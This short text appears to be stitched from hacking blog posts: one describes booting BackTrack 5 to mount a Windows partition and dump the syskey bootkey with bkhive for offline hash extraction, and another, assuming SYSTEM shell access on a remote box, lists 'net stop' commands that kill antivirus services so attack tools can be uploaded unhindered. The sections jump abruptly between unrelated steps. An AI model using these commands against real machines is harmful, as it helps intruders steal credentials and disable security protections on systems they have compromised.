Simply drop in your backtrack5 CD or USB and boot from the inserted media. Once booted type startx, you can do everything from the console but it’s nicer to have a pretty GUI!

Left click Places at the top and then click on the windows partition you wish to mount. Then open a terminal and first of all use bkhive to dump the syskey bootkey from the windows hive.

So you’ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like.

Here’s a quick list of services to kill:

net stop "Ahnlab Task Scheduler" net stop "altiris client service" net stop ANTIVIR net stop ATRACK net stop "avast! antivirus" net stop "avast! iavs4 control service" net stop AVCONSOL net stop "AVG6 Service"